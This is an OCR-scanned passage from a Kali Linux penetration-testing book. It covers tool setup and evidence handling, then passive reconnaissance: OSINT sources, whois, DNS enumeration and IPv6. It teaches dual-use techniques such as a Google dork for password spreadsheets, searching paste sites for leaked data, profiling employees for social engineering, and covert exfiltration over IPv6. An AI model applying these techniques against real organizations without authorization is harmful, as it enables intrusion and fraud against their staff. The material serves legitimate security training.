passwd: password updated successfully 
Changing the user information for no root 
Enter the new value, or press ENTER for the default 
Full Name [] : rwbeggs 
Room Number [] : 

Work Phone [] : 

Home Phone [] : 

Other [] : 

Is the information correct? [Y/n] y 
root@kali: # | 



Speeding up Kali operations 

Several tools can be used to optimize and speed up Kali operations: 

• When using a virtual machine, install the VM's software drive 

package: Guest Additions (VirtualBox) or VMware Tools (VMware). 
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• When creating a virtual machine, select a fixed disk size instead of one that is 
dynamically allocated. It is faster to add files to a fixed disk, and there is less 
file fragmentation. 

• The preload application (apt -get install preload) identifies a user's 
most commonly used programs and preloads binaries and dependencies into 
memory to provide faster access. It works automatically after the first restart 
following installation. 

• BleachBit (apt-get install bleachbit) frees disk space and improves 
privacy by freeing the cache, deleting cookies, clearing Internet history, 
shredding temporary files, deleting logs, and discarding other unnecessary 
files. Advanced features include shredding files to prevent recovery and 
wiping free disk space to hide traces of files that have not been fully deleted. 

• By default. Kali does not show all applications that are present in the start-up 
menu. Each application that is installed during the boot-up process slows the 
system data, and may impact memory use and system performance. Install 
Boot Up Manager (BUM) to disable unnecessary services and applications 
that are enabled during the boot up (apt -get install bum), as shown in 
the following screenshot: 



^ * Boot-Up Manager 



File Services Help 



Activate 


Description 


Running 




Metasploit Exploitation Framework 

metasploit-postgres 


P 


■ 


wired and wireless network manager - daemon 

wicd 


? 


• 


Fast remote file copy program 

rsync 


* 


a 


New generation audio server 

pulseaudio 




a 


Restores DNS 

pppd-dns 




a 


Configures your system for internet access via a modem 

dns-clean 


- 


m 


framework-postgres 




m 


New generation Web Server 

apache2 


V 


□ 


graphical boot animation and logger - main package 

plymouth-log 


? 


□ 


NFS support files common to client and server 

idmapd 


? 


□ 


clients and daemons for the Network Information Service (NIS) 

yppasswdd 


p 


□ 


RPC port mapper 

portmap-boot 


? 


□ 


Manages your Internet connection 

networking 


- 


□ 


Allows users securely to log into the machine remotely 

ssh 


? 


□ 


Delivers messages between applications 

dbus 


9 


□ 


Tool to report program crashes 

apport 


- 



| Apply | □ Advanced | Quit | 
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• Add gnome -do (apt -get install gnome - do) to launch applications 
directly from the keyboard. To configure gnome -do, select it from the 
Applications | Accessories menu. Once launched, select the Preferences 
menu, activate the Quiet Launch function, and select a launch command 
(for example, Ctrl + Shift). Clear any existing commands, and then enter 
the command line to be executed when the launch keys are selected. 

Rather than launching directly from the keyboard, it is possible to write 
specific scripts that launch complex operations. 

Sharing folders with Microsoft Windows 

The Kali toolset has the flexibility to share results with applications residing on 
different operating systems, especially Microsoft Windows. The most effective way 
to share data is to create a folder that is accessible from the host operating system 
as well as the Kali Linux VM guest. 

When data is placed in a shared folder from either the host or the VM, it is 
immediately available via the shared folder to all systems that access that 
shared folder. 

To create a shared folder, perform the following steps: 

1. Create a folder on the host operating system. In this example, it will be 
called Kali_Share. 

2. Right-click on the folder and select the Sharing tab. From this menu, 
select Share. 

3. Ensure that the file is shared with Everyone, and that Permission Level for 
this share is set to Read/ Write. 

4. If you have not already done so, install the appropriate tools onto BackTrack. 
For example, when using VMware, install the VMware tools (refer to Appendix , 
Installing Kali Linux). 

5. When the installation is complete, go to the VMware menu and select Virtual 
Machine Setting. Find the menu that enables Shared Folders and select 
Always Enabled. Create a path to the shared folder that is present on the 
host operating system, as shown in the following screenshot: 
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Virtual Machine Settings 




Although VirtualBox uses different menu titles, 
the process is the same. 

6. Open the file browser on the Kali desktop. The shared folder will be visible 
in the mnt folder (it might be placed in a sub-folder, hgf s). 

7. Drag the folder onto the Kali desktop to create a link to the real folder. 

8. Everything placed in the folder will be accessible in the folder of the same 
name on the host operating system, and vice versa. 

The shared folder, which will contain sensitive data from a penetration test, must be 
encrypted to protect the client's network and reduce the tester's liability should the 
data ever be lost or stolen. 
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Creating an encrypted folder with TrueCrypt 

During a penetration test, you will have access to sensitive client information, 
including exploitable vulnerabilities and copies of successfully breached data. 

It is the tester's legal and moral responsibility to ensure that this information in 
his care is secured at all times. The best means of meeting this responsibility is to 
ensure that all client information is encrypted during storage and transmission. 

To install TrueCrypt on BackTrack, complete the following steps: 

1. In the Applications menu, select Accessories | TrueCrypt. 

2. To create an encrypted folder, open the application. You will be presented 
with the main menu, as shown in the following screenshot: 
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3. On the main menu, select the Create Volume button. This will launch the 
TrueCrypt Volume Creation Wizard, as shown in the following screenshot: 




4. Select Create an encrypted file container, and then click on Next. 

5. The next screen will prompt for Volume Type, select Standard TrueCrypt 
volume, and click on Next. 

6. On the Volume Location screen, select Select File. You will be asked to 
Specify a New TrueCrypt Volume by providing a Name, and indicating that 
it will save in the folder specified, as shown in the following screenshot: 
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7. Chose a filename. Do not choose a filename related to the client being tested, 
or which indicates that sensitive material is present in the directory. Use a 
number or code word to represent the client, and a generic title for results. 
Save the file on the desktop, then click on Next. 

8. The next screen will provide you with Encryption Options. Select 
Encryption Algorithm from the drop-down menu. There are several 
choices, but for regular purposes, AES (the default 256-bit key) will suffice. 
You will also select a Hash Algorithm from the drop-down menu (the 
default, RIPEMD-160, should be sufficient). After your choices are complete, 
click on the Next button, as shown in the following screenshot: 



TrueCrypt Volume Creation Wizard 




Encryption Options 



Encryption Algorithm 



AES 



Test 



FIPS-approved cipher (RijndaeL, published in 1998) that 
may be used by U.S. government departments and 
agencies to protect classified information up to the Top 
Secret LeveL. 256-bit key, 128-bit block, 14 rounds 
(AES-256). Mode of operation is XTS. 



More information on AES 



Benchmark 



Hash Algorithm 



RIPEMD-160 



0 Information on hash algorithms 



HeLp 




< Prev 


Next > 




CanceL 



9. You will now be prompted for Volume Size. You should have a minimum 
size of approximately 500 MB, but this may vary depending on the testing 
regime. Click on Next. 
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10. The Volume Password should be selected according to the rules provided 
for strong passwords. Select and confirm the password, then click on Next, 
as shown in the following screenshot: 



v * TrueCrypt Volume Creation Wizard 




Volume Password 



Password: 
Confirm password: 



□ Display password 

□ Use keyfiles 



Keyfiles... 



It is very important that you choose a good password. You should 
avoid choosing one that contains only a single word that can be 
found in a dictionary (or a combination of 2, 3 ( or 4 such words}. It 
should not contain any names or dates of birth. It should not be 
easy to guess. A good password is a random combination of upper 
and lowercase letters, numbers, and special characters, such as @ 
^ = $* + etc. We recommend choosing a password consisting of 
more than 20 characters (the longer, the better). The maximum 
possible length is 64 characters. 



Help 


< Prev 


Next > 





Cancel 



11. The next screen allows you to select Format Options. For Filesystem 
Options select FAT from the drop-down menu. Click on Next. 

12. The next screen. Volume Format, creates a random key for the encrypted 
filesystem. The key is based on mouse movements, and you will be 
prompted to move the mouse over the window for a long period to ensure 
the randomness (cryptographic strength) of the encryption keys. When done, 
click on Format to create the TrueCrypt volume. 

13. The final volume has been created. It will appear as an icon on the desktop. 
The volume is encrypted, and it can be copied to an external storage device 
or moved to the host system and remain encrypted. 
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To use the encrypted volume, you must first choose a Slot to manage the encrypted 
folder in the main TrueCrypt menu. When this is done, use the Select File button 
to select the name of the encrypted file. In this case, well use a previously made file 
called pentest located on the desktop, as shown in the following screenshot: 




Click on the Mount button. At this point, you will be prompted for the password, as 
shown in the following screenshot: 



x Enter password for "/root/Desktop/pentest" 



Password: | 



OK 



□ Cache passwords and keyfiles in memory 

□ Display password 

□ Use keyfiles Keyfiles... 



Cancel 



Options > 



When the correct password is entered, you will see the Slot 1 details change to 
reflect the encrypted folder's properties, and a new icon called truerypti will 
be displayed on the desktop, will be displayed on the desktop, as shown in the 
following screenshot: 
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v * TrueCrypt 
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If you double-click on the truecryptl icon, you will be taken to a File Browser view. 

At this point, it will act as a regular directory, and you can use the folder to store 
all of the test-related information. When you work with the contents of the folder, 
and wish to ensure that all data is encrypted, select Dismount on the main menu. 
The folder will revert to an encrypted state. 

Managing third-party applications 

Although Kali comes preloaded with several hundred applications, it is 
likely that you will need to install additional applications to effectively test specific 
environments (such as industrial systems), add new cutting edge tools, or ensure 
that your favorite tools are installed. Kali makes it easy to locate, install, and 
manage these tools. 

Installing third-party applications 

There are multiple ways to install third party applications: using the apt -get 
command, accessing a GitHub repository, and directly installing the application. 

All tools should be installed from the Kali Linux repository using the apt -get 
install command. The install command can be executed from the command line 
in a terminal window, or the user may select a graphical package management tool. 
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Recommended third-party applications include: 

• apt-file: This is a command-line tool to search within packages of the 
APT packaging system. It allows you to list contents of a package without 
installing or fetching it. 

• gnome -tweak- tool: This allows users to change themes and rapidly 
configure desktop options. 

• instanbul: This is a desktop screen recorder that allows you to make a 
movie of desktop activities. 

• openof f ice: This is an open source office productivity suite that assists 
in documentation. 

• scrub: This is a secure deletion (anti-forensic) tool that securely deletes 
data to comply with stringent government standards using various 
overwrite patterns. 

• shutter: This is a screenshot tool that captures images of a desktop, 
open window, or a selection. 

• team viewer: This supports remote access and remote administration. 

It also allows testers to place a pre-configured computer (a dropbox) on the 
target network and control testing from a remote location. 

• terminator: This is a replacement for the Linux terminal window that 
allows horizontal scrolling — no more wrapped text! 

Tools that are not present in a Debian repository and are accessible using apt -get 
install can still be installed on Kali. However, the user must accept that manual 
installs are not coordinated with repositories, and they may break dependencies 
causing applications to fail. 

Some tools use the GitHub online repository for software development projects. 
Many developers favor this open repository due to the flexibility of the Git revision 
system as well as the social-media aspects of the software sites. One tool that we will 
be using is recon- ng, a web reconnaissance framework. 

To clone the current version of recon- ng from the GitHub repository, use the 
following command line: 

cd /opt; git clone 

https : //LaNMaSteR53@bitbucket . org/LaNMaSteR53/recon-ng . git 
cd opt/recon-ng 
. /recon-ng.py 
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Finally, some applications must be manually installed. For example, to restore the 
asynchronous port scanner Unicornscan, can back to Kali, you must: 

• Ensure the dependencies are first present: apt-get install flex 

• Download the latest version of Unicornscan (www . unicornscan . org - the 
current version is unicornscan-0.4.7-2) 

• Extract the contents of the file to a new directory: tar j xf 
unicornscan- 0 . 4 . 7-2 . tar . bz2 

• Change to the directory containing Unicornscan: cd unicornscan- 0.4.7/ 

• Compile the source code: ./configure CFLAGS = -D_GNU_SOURCE && make 
&& make install 

The exact dependencies and make install process will vary for each application, so 
you will need to refer to the developer's readme file to ensure correct installation and 
configuration of these applications. 

Running third-party applications with 
non-root privileges 

Kali Linux is intended to support penetration testing. Most of the tools require 
root-level access, which is why access to the toolset and data is protected with 
passwords and encryption. 

However, some third-party tools are not meant to run with root-level privileges. 
Tools such as web browsers may be compromised, and giving an attacker access to 
root privileges can have a significant security impact. 

If root access is not required, tools should follow the principle of least privilege and 
run as non-root users. 

To run an application that normally runs as a non-root user, log on to Kali using a 
root account. Kali should be configured with a non-root account. In this example, 
we will use the noroot account previously created with the adduser command. 

Perform the following steps to run the web browser Iceweasel as non-root: 

1. Create a non-root user account. In this example, we will use noroot. 

2. We will use sux, which is a wrapper application that transfers credentials 
from a privileged user to a target non-root user. Download and install sux 
using the apt -get install command. 
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3. Start the web browser, and then minimize it. 

4. Enter the command line: ps aux |grep iceweasel. As you can see. 

Ice weasel is running with root privileges. 

5. Close Iceweasel, and relaunch using the command sux - noroot 
iceweasel, as shown in the following screenshot: 

root@test: # ps aux |grep iceweasel 

root 4604 5.1 17.8 585044 89084 ? SI 17:56 0:01 iceweasel 

root 4687 0.0 0.1 7768 860 pts/0 S+ 17:56 0:00 grep iceweasel 

rootptest : # sux - no root iceweasel 



If you examine the Iceweasel title bar, shown in the following screenshot, you will 
see that it was invoked as the user noroot, an account that did not have 
administrator privileges. 



Kali Linux, an Offensive Security Project - Iceweasel (as noroot) 

FiLe Edit View History Bookmarks TooLs HeLp 



I [..] KaLi Linux, an Offensive Securit... ^ i 



fiLe:///usr/share/kaLi-defauLts/web/ v &\ [B v GoogLe fyj 



) Most Visited v |j| Offensive Security S* KaLi Linux KaLi Docs 



You can also confirm that Iceweasel is running under the noroot account by 
examining the open processes, as shown in the following screenshot: 

root@test: # ps aux |grep iceweasel 

root 4729 6.0 G.3 56084 1692 pts/0 S+ 17:57 0:00 su - noroot -c 

eval $TERM; exec env TERM='xterm' DISPLAY^ 1 : 0 . O 1 "iceweasel"; 

no root 4750 0.8 19.0 592224 94976 ? Ssl 17:57 0:02 iceweasel 

r oot 4847 0.0 0.1 7768 8 60 pts/1 S+ 18: 02 0:00 grep iceweasel 



Effective management of penetration tests 

One of the most difficult aspects of penetration testing is remembering to test all of 
the relevant parts of the network or system target, or trying to remember if the target 
was actually tested, after the testing has been completed. 
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BT 5r3 emphasized the use of management tools such as Draedis and MagicTree. 
These tools facilitate group testing by providing a central repository for test data. 

In addition, they usually provide some framework so that testers know where they 
are within a testing methodology, and what tests remain to be completed. Tools of 
this nature are excellent in coordinating defined group activities during 
a vulnerability assessment or penetration test. 

These tools remain in the Applications | Kali Linux | Reporting Tools | Evidence 
Management menu. 

But what about complex penetration tests where the methodology may be more fluid 
as it adapts to the network target? 

Some testers use keyloggers or Wireshark during testing to record keystrokes and 
packet traffic generated during the test. This data can be especially useful if the 
testing is causing a network or application outage, because replaying and analyzing 
the packets sent can identify which packet tools impacted the network. 

Kali Linux includes several tools that are more suited to making rapid notes and 
serving as a repository of rapidly added cut-and-paste data, including KeepNote 
and the Zim desktop wiki. 

Testers not only need to perform tests and collect data, they also need to be able 
to provide their findings to the client. This can be difficult, as some results are 
transient — a test demonstrates a finding at one point in time, and then something is 
changed on the target system, and future testing fails to demonstrate the exploitable 
vulnerability, even though it's possible for it to re-emerge. 

The other challenge with positive results is that they need to be demonstrated to a 
client in a way that's understandable. 

The golden rule is to always grab a screenshot of any positive, or potential, finding. 
Use a tool such as Shutter to capture images from the desktop. 

By default. Kali is configured with CutyCapt, which is a cross-platform command- 
line utility that captures a web page and creates a variety of image types, including 
PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. 
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For example, to create an image of a specific size from the Google search page, enter 
the following from a command-line prompt: 

..cutycapt - -url=http: //www. google. com - -out=google . png - -min-width=3 0 0 
- -min-heightheight=250 . 

On execution, an image of the size specified in the previous command is displayed, 
as shown in the following screenshot: 



root@kali2 cutycapt - -url=http ://www. google .com - -out=google .png - -min-width=300 - -min-height=250 
root@kali2 : # Is 

Desktop google, png ImageMagick: google. png 

root@kali2: # display google. png 



Google 

£ ^Canada 



Google Searc h I'm F eeling Lucky 
Goog H ci ottered in Fungut 

Advertising Piograms Birsmess Solutions •Google About Google 
• JOU - Fnvicy 1 Terra 



CutyCapt is especially useful when demonstrating the presence of web-based 
vulnerabilities such as cross-site scripting. 

Static images can be very useful, however, a video of an exploit that compromises 
a target network and shows the actions of an attacker as they compromise sensitive 
data is a very compelling tool. The instanbul screen recorder creates a video of an 
"exploit in progress," which allows the exploit to be replayed for training purposes, 
or to demonstrate the vulnerability to the client. 

Summary 

In this chapter, we examined Kali, a collection of tools widely used by legitimate 
penetration testers and hackers to assess the security of data systems and networks. 
We emphasized Kali as a virtual machine, allowing both the host operating system 
and the VM guest to support testing. 
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Kali is a repository of tools, and one of the challenges in using it is ensuring that the 
tools are up-to-date. We reviewed the Debian packet management system, and how 
updates could be initiated from both the command line and from GUI applications. 
Most importantly, we learned how to customize Kali to increase the security of our 
tools and the data that they collect. We are working to achieve the goal of making 
tools support our process, instead of the other way around! 

In the next chapter, we will learn how to effectively use Open Source Intelligence 
(OSINT) to identify the vulnerable attack surfaces of our target and create 
customized username:password lists to facilitate social engineering attacks and 
other exploits. 
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Reconnaissance is the first step of the kill chain when conducting a penetration 
test or an attack against a network or server target. An attacker will typically 
dedicate up to seventy-five percent of the overall work effort for a penetration test 
to reconnaissance, as it is this phase that allows the target to be defined, mapped, 
and explored for the vulnerabilities that will eventually lead to exploitation. 

There are two types of reconnaissance: passive reconnaissance, and 
active reconnaissance. 

Generally, passive reconnaissance is concerned with analyzing information that is 
openly available, usually from the target itself or public sources online. On accessing 
this information, the tester or attacker does not interact with the target in an unusual 
manner — requests and activities will not be logged, or will not be traced directly to 
the tester. Therefore, passive reconnaissance is conducted first to minimize the direct 
contact that may signal an impending attack or to identify the attacker. 

In this chapter, you will learn the principles and practices of passive reconnaissance, 
which include the following: 

• Basic principles of reconnaissance 

• Open-source intelligence (OSINT) 

• DNS reconnaissance and route mapping, including issues with IPv4 and IPv6 

• Obtaining user information 

• Profiling users for password lists 

Active reconnaissance, which involves direct interaction with the target, will be 
covered in Chapter 3, Active Reconnaissance and Vulnerability Scanning. 
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Basic principles of reconnaissance 

Reconnaissance, or recon, is the first step of the kill chain when conducting a 
penetration test or attack against a data target. This is conducted in before the 
actual test or attack of a target network. The findings will give a direction to where 
additional reconnaissance may be required, or the vulnerabilities to attack during 
the exploitation phase. 

Reconnaissance activities are segmented on a gradient of interactivity with the target 
network or device. 



Passive 

reconnaissance 

(no direct Active 

interaction) reconnaissance 



O O O 



Normal interaction 



More information 
greater chance of 
detection 



Passive reconnaissance does not involve direct interaction with the target network. 
The attacker's source IP address and activities are not logged (for example, a Google 
search for the target's e-mail addresses). It is difficult, if not impossible, for the target 
to differentiate passive reconnaissance from normal business activities. 

In general, passive reconnaissance focuses on the business and regulatory 
environment, the company, and the employees. Information of this type is available 
on the Internet or other public sources, and is sometimes referred to as open source 
intelligence, or OSINT. 

• Passive reconnaissance also involves the normal interactions that occur when 
an attacker interacts with the target in an expected manner. For example, 

an attacker will log on to the corporate website, view various pages, and 
download documents for further study. These interactions are expected user 
activities, and are rarely detected as a prelude to an attack on the target. 

• Active reconnaissance involves direct queries or other interactions (for 
example, port scanning of the target network) that can trigger system alarms 
or allow the target to capture the attacker's IP address and activities. This 
information could be used to identify and arrest an attacker, or during legal 
proceedings. Because active reconnaissance requires additional techniques 
for the tester to remain undetected, it will be covered in Chapter 3, Active 
Reconnaissance and Vulnerability Scanning. 
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Penetration testers or attackers generally follow a process of structured information 
gathering, moving from a broad scope (the business and regulatory environments) to 
the very specific (user account data). 

To be effective, testers should know exactly what they are looking for and how the 
data will be used before collection starts. Using passive reconnaissance and limiting 
the amount of data collected minimizes the risks of being detected by the target. 



Open Source intelligence 

Generally, the first step in a penetration test or an attack is the collection of 
open-source intelligence, or OSINT. 

OSINT is information collected from public sources, particularly the Internet. The 
amount of available information is considerable — most intelligence and military 
organizations are actively engaged in OSINT activities to collect information about 
their targets, and to guard against data leakage about them. 

The process of OSINT collection and analysis is complex and could constitute its own 
book; therefore, we will cover only the essential highlights. 




The US Army manual ATP 2-22.9 (http : / / www . f as . org/ 
irp/doddir/army/atp2-22-9 .pdf) and the NATO OSINT 
manual (http : / / information-retrieval . info/docs/ 
NATO -OSINT . html) are both available online, and provide 
excellent technical reviews of how to gather and assess OSINT. 



The information that is targeted for collection is dependent on the initial goal of 
the penetration test. For example, if testers wants to access financial data, they will 
need the names and biographical information of relevant employees (CFO, accounts 
receivable and payable, and so on), their usernames, and passwords. If the route of 
an attack involves social engineering, they may supplement this information with 
details that give credibility to the requests for information. 

OSINT gathering usually starts with a review of the target's official online presence 
(website, blogs, social-media pages, and third-party data repositories such as public 
financial records). Information of interest includes the following: 

• Geographical locations of offices, especially remote or satellite offices that 
share corporate information but may lack stringent security controls. 

• An overview of the parent company and any subsidiary companies, 
especially any new companies acquired by mergers or acquisitions 
(these companies are frequently not as secure as the parent company). 
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• Employee names and contact information, especially names, e-mail 
addresses, and phone numbers. 

• Clues about the corporate culture and language; this will facilitate social 
engineering attacks. 

• Business partners or vendors that may connect into the target's network. 

• Technologies in use. For example, if the target issues a press release about 
adopting new devices or software, the attacker will review the vendor's 
website for bug reports, known or suspected vulnerabilities, and details that 
could be used to facilitate various attacks. 

Other online information sources used by the attacker may include the following: 

• Search engines such as Google and Bing. Historically, these searches 
are highly manual; the attacker enters search terms that are specific for 
information of interest; for example, the search term "company name" 

+ password filetype:xls may identify an Excel spreadsheet that contains 
employee passwords. These search terms are referred to as google dorks 
(www. exploit -db . com/ google -dorks/). Most search engines have since 
released APIs to facilitate automated lookups, making tools such as Maltego 
particularly effective. 

One of the most effective search engines is Yandex (www . yandex . 
com). This Russian language search engine, the fourth-largest 
search engine in the world, allows users to search in several 
languages, including English. It also supports very granular search 
expressions, making it more effective than Google when searching 
for specific information. 

Other online sources that should be searched include: 

• Government, financial, or other regulatory sites that provide information 
on mergers and acquisitions, names of key persons, and supporting data 

• Usenet newsgroups, particularly postings from the target's employees 
looking for help with particular technologies 

• Linkedln, Jigsaw, and other websites that provide employee information 

• Job search websites, especially ones for technical positions that provide 
a list of the technologies and services that must be supported by a 
successful applicant 

• Historic or cached content, retrieved by search engines (cache:url in Google, 
or WayBack Machine at www . archive . org) 
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• Country- and language-specific social and business related sites (refer to 
http : // searchenginecolossus . com) 

• Sites that aggregate and compare results from multiple search engines, 
such as Zuula (www . zuula . com) 

• Corporate and employee blogs, as well as personal blogs of key employees 

• Social networks (Linkedln, Facebook, and Twitter) 

• Sites that provide lookups of DNS, route, and server information, especially, 
DNSstuff (www. dnsstuf f . com), ServerSniff (www. serversnif f .net), 
Netcraft ( www . netcraft . com), and myIPneighbors . com 

• Shodan (www . shodanHQ . com), sometimes referred to as the "hacker's Google"; 
Shodan lists Internet-accessible devices and allows the tester to search for 
devices with known vulnerabilities 

• Password dumpsites (pastebin, search using site : pastebin . com 
"targetURL") 

Managing findings can be difficult; however. Kali comes with KeepNote, which 
supports the rapid import and management of different types of data. 

DNS reconnaissance and route mapping 

Once a tester has identified the targets that have an online presence and contain 
items of interest, the next step is to identify the IP addresses and routes to the target. 

DNS reconnaissance is concerned with identifying who owns a particular domain or 
series of IP addresses (whois-type information), the DNS information defining the 
actual domain names and IP addresses assigned to the target, and the route between 
the penetration tester or the attacker and the final target. 

This information gathering is semi-active — some of the information is available from 
freely available open sources, while other information is available from third parties 
such as DNS registrars. Although the registrar may collect IP addresses and data 
concerning requests made by the attacker, it is rarely provided to the end target. The 
information that could be directly monitored by the target, such as DNS server logs, 
is almost never reviewed or retained. 

Because the information needed can be queried using a defined systematic and 
methodical approach, its collection can be automated. 
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Note that DNS information may contain stale or incorrect entries. 

To minimize inaccurate information, query different source servers 
and use different tools to cross-validate results. Review results, and 
manually verify any suspect findings. Use a script to automate the 
collection of this information. The script should create a folder for 
the penetration test, and then a series of folders for each application 
being run. After the script executes each command, pipe the results 
directly to the specific holding folder. 



WHOIS 

The first step in researching the IP address space is to identify the addresses that 
are assigned to the target site. This is usually accomplished by using the who is 
command, which allows people to query databases that store information on the 
registered users of an Internet resource, such as a domain name or IP address. 

Depending on the database that is queried, the response to a who is request will 
provide names, physical addresses, phone numbers, and e-mail addresses (useful in 
facilitating social engineering attacks), as well as IP addresses and DNS server names. 

An attacker can use information from a who is query to: 

• Support a social engineering attack against the location or persons identified 
in the query 

• Identify a location for a physical attack 

• Identify phone numbers that can be used for a war dialing attack, or to 
conduct a social engineering attack 

• Conduct recursive searches to locate other domains hosted on the same 
server as the target or operated by the same user; if they are insecure, an 
attacker can exploit them to gain administrative access to the server, and then 
compromise the target server 

• In cases where the domain is due to expire, an attacker can attempt to seize 
the domain, and create a look-alike website to compromise visitors who 
think they are on the original website 

• An attacker will use the authoritative DNS servers, which are the records for 
lookups of that domain, to facilitate DNS reconnaissance 
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Note that there is an increase in the usage of third parties to shield this data, and 
some domains, such as . gov and . mil, may not be accessible to the public domain. 
Requests to these domains are usually logged. There are several online lists available 
that describe domains and IP addresses assigned for government use; most tools 
accept options for "no contact" addresses, and government domains should be 
entered into these fields to avoid the wrong type of attention! 

The easiest way to issue a whois query is from the command line. The following 
screenshot shows the whois command run against the domain of Digital Defence: 



root@kali: # whois digitaldefence .ca 



Domain name: 
Domain status: 
Creation date: 
Expiry date: 
Updated date: 



digit aldef ence .ca 
registered 
2002/06/10 
2016/06/10 
2011/05/31 



Regist rar : 
Name : 
Number: 



Tucows.com Co. 
156 



Regist rant : 

Name: DigitalDefence, Inc 

Administrative contact: 

Name : 

Postal address: 

Phone : 

Fax : 

Email : 



Robert W. Beggs 

302-3310 South Service Road 

Burlington ON L7N 3M6 Canada 

905-681-3310 

416-644-8801 

robert .beggs@digitaldefence .ca 



Technical contact: 
Name : 

Postal address: 

Phone : 

Fax : 

Email : 



Robert W. Beggs 

3O2-3310 South Service Road 

Burlington ON L7N 3M6 Canada 

905-681-331O 

416-644-8801 

robert .beggs@digitaldefence .ca 



Name servers: 

ns03 .businesscatalyst .com 
nsOl .businesscatalyst .com 



The returned whois record contains geographical information, names, and contact 
information — all of which can be used to facilitate a social engineering attack. 

There are several websites that automate whois lookup enquiries, and attackers can 
use these sites to insert a step between the target and themselves; however, the site 
doing the lookup may log the requester's IP address. 
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DNS reconnaissance 

The Domain Name System (DNS), is a distributed database that resolves names 
(www. digitaldef ence . ca) to its IP addresses (192 . 150 . 2 . 140). 

Attackers use the DNS information in the following ways: 

• Using brute-force attacks, allows attackers to identify new domain names 
associated with the target. 

• If the DNS server is configured to permit a zone transfer to any requester, 
it will provide hostnames and IP addresses of Internet-accessible systems, 
making it easier to identify potential targets. If the target does not segregate 
public (external) DNS information from private (internal) DNS information, 
a zone transfer might disclose the hostnames and IP addresses of internal 
devices. (Note that most IDS and IPS systems will trigger an alarm if a zone 
transfer request is triggered). 

• Finding services that may be vulnerable (for example, FTP) or are otherwise 
interesting (remote administration panels and remote access). 

• Finding misconfigured and/ or unpatched servers 
(dbase . test . target . com). 

• Service records (SRV), provide information on service, transport, port, 
and order of importance for services. This can allow an attacker to deduce 
the software. 

• DomainKeys Identified Mail (DKIM) and Sender Policy Framework (SPF) 

records are used to control spam e-mails. If these records are identified, the 
attacker knows that: 

° They are more security conscious than most organizations. 

° This may impact phishing and other social engineering attacks. 

Both Windows and Unix support basic command-line tools such as nslookup, and 
Unix systems support additional command-line options such as dig. Unfortunately, 
these commands usually interrogate one server at a time, and require interactive 
responses to be effective. 

Kali features several tools designed to iteratively query DNS information for a 
particular target. The selected tool must accommodate the Internet Protocol version 
that is used for communications with the target — IPv4 or IPv6. 



[ 50 ] 




Chapter 2 



IPv4 

The IP, or Internet Protocol address, is a unique number used to identify devices 
that are connected to a private network or the public Internet. Today, the Internet 
is largely based on version 4, IPv4. Kali includes several tools to facilitate DNS 
reconnaissance, as given in the following table: 



Application 


Description 


dnsenum, dnsmap, and dnsrecon 


These are comprehensive DNS scanners — DNS 
record enumeration (A, MX, TXT, SOA, wildcard, 
and so on), subdomain brute-force attacks, Google 
lookup, reverse lookup, zone transfer, and zone 
walking, dsnrecon is usually the first choice — it is 
highly reliable, results are well parsed, and data can 
be directly imported into the Metasploit Framework. 


dnstracer 


This determines where a given Domain Name System 
gets its information from, and follows the chain of 
DNS servers back to the servers which know the data. 


dnswalk 


This DNS debugger checks specified domains for 
internal consistency and accuracy. 


fierce 


This locates non-contiguous IP space and hostnames 
against specified domains by attempting zone 
transfers, and then attempting brute-force attacks to 
gain DNS information. 



During testing, most investigators run fierce to confirm that all possible targets 
have been identified, and then run at least two comprehensive tools (for example, 
dnsenum and dnsrecon) to generate the maximum amount of data and provide a 
degree of cross validation. 
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In the following screenshot, dnsrecon is used to generate a standard DNS record 
search, and a search that is specific for SRV records. An excerpt of the results is 
shown for each case. 



root@kali: # dnsrecon -t std -d google.com 
Performing General Enumeration of Domain: 

DNSSEC is not configured for google.com 
SOA nsl.google.com 216.239.32.16 
NS ns3.google.com 216.239.36.16 
NS ns2.google.com 216.239.34.16 
NS ns4.google.com 216.239.38.16 
NS nsl.google.com 216.239.32.16 
MX alt2 .aspmx .1 .google .com 74.125.131.27 
MX altl .aspmx .1 .google .com 173.194.76.27 
MX alt3 .aspmx .1 .google .com 173.194.66.27 
MX alt4 .aspmx .1 .google .com 74.125.136.26 
MX aspmx .1 .google .com 74.125.142.27 
MX alt2 .aspmx .1 .google .com 2667 : f8b6 :466c : c 6 1 
MX altl .aspmx .1 .google .com 2667 : f8b6 :466d :c62 
MX alt3 .aspmx .1 .google .com 2a66 : 1456 :466c :c66 
MX alt4 .aspmx .1 .google .com 2a66 : 1456 :4613 :c66 
MX aspmx.l.google.com 2667 : f8b6 :466d :c62 : : la 
A google.com 173.194.43.72 
A google.com 173.194.43.64 
A google.com 173.194.43.66 
A google.com 173.194.43.76 
A google.com 173.194.43.78 
A google.com 173.194.43.67 
A google.com 173.194.43.68 
A google.com 173.194.43.71 
A google.com 173.194.43.73 
A google.com 173.194.43.69 
A google.com 173.194.43.65 



[-] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 

[*] 



AAAA google.com 2667 : f8b6 :466b :866 :: 1669 



la 

lb 

la 

la 



DNSrecon allows the penetration tester to obtain the SOA record, name servers (NS), 
mail exchanger (MX) hosts, servers sending e-mails using Sender Policy Framework 
(SPF), and the IP address ranges in use. 
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IPv6 

Although IPv4 seems to permit a large address space, freely available IP addresses 
were exhausted several years ago, forcing the employment of NAT and DHCP to 
increase the number of available addresses. A more permanent solution has been 
found in the adoption of an improved IP addressing scheme, IPv6. Although it 
constitutes less than five percent of Internet addresses, its usage is increasing, and 
penetration testers must be prepared to address the differences between IPv4 and IPv6. 

In IPv6, the source and destination addresses are 128 bits in length, yielding 2 128 
possible addresses, that is, 340 undecillion addresses! 

The increased size of the addressable address space presents some problems 
to penetration testers, particularly when using scanners that step through the 
available address space looking for live servers. However, some features of the 
IPv6 protocol have simplified discovery, especially the use of ICMPv6 to identify 
active link-local addresses. 

It is important to consider IPv6 when conducting initial scans for the 
following reasons: 

• There is uneven support for IPv6 functionality in testing tools, so the tester 
must ensure that each tool is validated to determine its performance and 
accuracy in IPv4, IPv6, and mixed networks. 

• Because IPv6 is a relatively new protocol, the target network may contain 
misconfigurations that leak important data; the tester must be prepared to 
recognize and use this information. 

• Older network controls (firewalls, IDS, and IPS) may not detect IPv6. 

In such cases, penetration testers can use IPv6 tunnels to maintain covert 
communications with the network, and exfiltrate the data undetected. 

